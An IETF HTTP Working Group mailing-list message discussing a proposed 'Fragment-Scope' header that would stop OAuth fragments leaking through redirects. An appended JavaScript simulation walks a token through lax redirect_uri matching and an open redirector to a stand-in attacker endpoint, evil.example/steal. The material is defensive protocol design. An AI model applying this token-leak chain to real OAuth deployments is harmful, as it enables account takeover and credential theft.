- From: Mark Nottingham <mnot@mnot.net>
- Date: Fri, 9 Jan 2015 14:56:22 -0500
- To: HTTP Working Group <ietf-http-wg@w3.org>
Brad Hill brought up an interesting proposal on the repo (I closed the issue as it was in the wrong place).

--8<---
A recurring weakness with OAuth and related capability URL usages (http://www.w3.org/TR/capability-urls/) is the reapplication of URL fragments on redirects: http://tools.ietf.org/html/rfc7231#section-9.5

This behavior is frequently abused in combination with resources that act as open redirectors to leak sensitive information in a fragment.

I would like to suggest an additional header, 'Fragment-Scope', that could be sent with a Location header on a 3xx to control the disposition of a fragment after a redirect. Values would be 'no-redirect', which would instruct the user agent to discard the fragment on any subsequent redirect, or 'same-origin', which would discard the fragment after any non-same-origin redirect.

The scope rule, once set, would remain until the user agent terminates following redirects (so a 'same-origin' policy could not be stripped by redirecting to a second open-redirector in the same origin, and then off-origin from there).
-->8--

What do people think?

--
Mark Nottingham
http://www.mnot.net/
Received on Friday, 9 January 2015 19:56:50 UTC
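The redirect chain the quoted proposal is about, worked through as an added example (not part of the thread, and not code from any participant or browser). A simulated user agent follows a chain of 3xx responses, applying RFC 7231's inheritance rule (section 7.1.2: a Location without a fragment inherits the fragment of the URI being redirected, which is what section 9.5 warns about) and then the proposed Fragment-Scope header. The hostnames idp.example, app.example and evil.example, the token value, the lax prefix match on redirect_uri and the ?next= open redirector are all constructed. Three details the message leaves open are filled in as assumptions: 'same-origin' is judged per hop between the redirecting URL and its Location target; the header governs only an inherited fragment, not one a Location carries explicitly; and a later Fragment-Scope may tighten but never loosen the policy already set.

```javascript
'use strict';

// Constructed endpoints for the demonstration.
const APP_CB = 'https://app.example/cb';      // the app's registered redirect URI
const EVIL = 'https://evil.example/steal';    // attacker's collection endpoint

// Assumption: a later header may tighten the sticky policy but not loosen it.
const SCOPE_RANK = new Map([['same-origin', 1], ['no-redirect', 2]]);

function tightenScope(current, headerValue) {
  const v = (headerValue || '').trim().toLowerCase();
  if (!SCOPE_RANK.has(v)) return current;                    // absent or unknown value
  if (current === null || SCOPE_RANK.get(v) > SCOPE_RANK.get(current)) return v;
  return current;
}

function stripFragment(url) {
  const u = new URL(url.href);
  u.hash = '';                                               // fragments are never sent to the server
  return u.href;
}

// server: (hrefWithoutFragment) => { status, headers } with lower-cased header names.
// honourFragmentScope=false models a user agent that does not implement the proposal.
function followRedirects(startHref, server, { honourFragmentScope = true, maxHops = 10 } = {}) {
  let current = new URL(startHref);
  let scope = null;                                          // sticky Fragment-Scope policy
  const trail = [current.href];
  for (let hop = 0; hop < maxHops; hop++) {
    const resp = server(stripFragment(current));
    if (resp.status < 300 || resp.status > 399 || !resp.headers.location) {
      return { finalUrl: current.href, trail, scope };
    }
    const next = new URL(resp.headers.location, current);    // Location may be relative
    if (!next.hash && current.hash) {
      // RFC 7231 inheritance, unless a policy set by an earlier response forbids it.
      // Assumption: same-origin is compared per hop, redirecting URL vs. its target.
      const sameOrigin = next.origin === current.origin;
      const discard = honourFragmentScope &&
        (scope === 'no-redirect' || (scope === 'same-origin' && !sameOrigin));
      if (!discard) next.hash = current.hash;
    }
    // The header on this response governs subsequent redirects, so apply it after deciding this hop.
    if (honourFragmentScope) scope = tightenScope(scope, resp.headers['fragment-scope']);
    current = next;
    trail.push(current.href);
  }
  throw new Error('redirect limit exceeded');
}

// Constructed servers for the three origins. idpFragmentScope is the header value the
// IdP attaches to its redirect; null models today's behaviour (no such header).
function makeServer(idpFragmentScope) {
  return (href) => {
    const u = new URL(href);
    if (u.origin === 'https://idp.example' && u.pathname === '/authorize') {
      const redirectUri = u.searchParams.get('redirect_uri') || '';
      // Lax prefix match on the registered redirect URI lets an attacker-chosen
      // ?next= ride along on the callback URL.
      if (!redirectUri.startsWith(APP_CB)) return { status: 400, headers: {} };
      const loc = new URL(redirectUri);
      loc.hash = 'access_token=SECRET-TOKEN&token_type=bearer';   // implicit grant: token in fragment
      const headers = { location: loc.href };
      if (idpFragmentScope) headers['fragment-scope'] = idpFragmentScope;
      return { status: 302, headers };
    }
    if (u.origin === 'https://app.example' && u.searchParams.has('next')) {
      // Open redirector: Location carries no fragment, so the token is inherited onto it.
      return { status: 302, headers: { location: u.searchParams.get('next') } };
    }
    return { status: 200, headers: {} };
  };
}

function authorizeUrl(redirectUri) {
  const u = new URL('https://idp.example/authorize');
  u.searchParams.set('response_type', 'token');
  u.searchParams.set('client_id', 'demo-client');
  u.searchParams.set('redirect_uri', redirectUri);
  return u.href;
}

function leaksToken(result) {
  return new URL(result.finalUrl).hash.includes('access_token=');
}

function runScenarios() {
  const direct = authorizeUrl(`${APP_CB}?next=${EVIL}`);
  // Two same-origin redirector hops before leaving the origin: the laundering case.
  const laundered = authorizeUrl(`${APP_CB}?next=https://app.example/r?next=${EVIL}`);
  return {
    today: followRedirects(direct, makeServer(null)),
    sameOrigin: followRedirects(direct, makeServer('same-origin')),
    sameOriginLaundered: followRedirects(laundered, makeServer('same-origin')),
    noRedirectLaundered: followRedirects(laundered, makeServer('no-redirect')),
    legacyUa: followRedirects(direct, makeServer('same-origin'), { honourFragmentScope: false }),
  };
}

for (const [name, r] of Object.entries(runScenarios())) {
  console.log(`${name}: token leaked=${leaksToken(r)}  ${r.trail.join(' -> ')}`);
}
```

Without the header the token arrives at evil.example in the fragment; 'same-origin' drops it at the off-origin hop even when the attacker first bounces through a second redirector on app.example, because the policy stays in force for the rest of the chain; 'no-redirect' drops it at the first redirect of any kind. The legacyUa case is the caveat: a user agent that does not implement the header still inherits the fragment, so the header protects only users of agents that adopt it.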